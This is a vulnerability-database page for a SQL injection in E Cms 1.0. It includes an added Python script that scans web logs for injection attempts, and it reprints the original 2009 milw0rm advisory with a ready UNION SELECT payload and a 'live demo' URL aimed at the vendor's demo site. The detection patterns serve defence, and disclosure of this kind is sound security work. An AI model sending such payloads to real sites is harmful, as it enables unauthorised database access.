Vendor: E Cms
By: Red-D3v1L
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: E Cms
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:enterbt:e_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

E Cms <= 1.0 Remote SQL Injection Vulnerability

E Cms version 1.0 is vulnerable to remote SQL injection through the `s` query parameter of `index.php`. An attacker can exploit it by sending an HTTP request whose `s` value contains SQL syntax. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
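
To check whether a deployment was probed before the upgrade, the following added example (not part of the original advisory or of E Cms) scans web-server access logs for SQL syntax in the `s` parameter of `index.php`, the parameter named in the raw advisory on this page. It assumes combined log format; the log lines are constructed samples and the keyword pattern is a heuristic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request portion of a combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Heuristic: SQL syntax that should not appear in the `s` value. Tune for your site.
SQLI_RE = re.compile(
    r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|--|/\*|'"
    r"|\b(?:version|sleep|benchmark|load_file)\s*\(", re.I | re.S)

def normalise(value, rounds=3):
    """Undo repeated URL encoding, then strip inline SQL comments and extra spaces."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

def scan(lines):
    """Return (client_ip, status, decoded_value) for suspicious index.php?s= requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/index.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("s", []):
            value = normalise(raw)
            if SQLI_RE.search(value):
                hits.append((m["ip"], int(m["status"]), value))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Aug/2009:10:00:01 +0200] "GET /html/index.php?s=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Aug/2009:10:00:05 +0200] "GET /html/index.php?s=-10+union+select+version()-- HTTP/1.1" 200 812',
    '198.51.100.7 - - [18/Aug/2009:10:00:09 +0200] "GET /html/index.php?s=-10%2520UnIoN/**/SeLeCt%2520version() HTTP/1.1" 200 812',
    '192.0.2.44 - - [18/Aug/2009:10:01:00 +0200] "GET /html/style.css?s=union HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} s={value!r}")
```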

Exploit-DB raw data:

==============================================================================
                         ##  Hackteach.OrG ##
             
                      zZzZzZz                 zZzZzZz
                          Zz     ooooo            Zz    
                         Zz      o   o           Zz  
                        Zz       o   o          Zz 
                       Zz        o   o         Zz    
                      Zz         ooooo        Zz 
                     zZzZzZz                 zZzZzZz     
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  E Cms <= 1.0 Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:               [ E Cms 1.0]
    [»] Language:           [ PHP ]
    [»] Home:               [ http://cmsdemo.enterbt.hu ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc And Str0ke :$ ]
    [»] Fuck To :           [ Anti-trust << Big Big Big Lamer << ]
#########################################################################
 
===[ Exploit SQL ]===  
    [»] Path/index.php?s=-10+union+select+version()--
    [»] L1v3 d3m0 : http://cmsdemo.enterbt.hu/html/index.php?s=-10+union+select+version()--

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-18]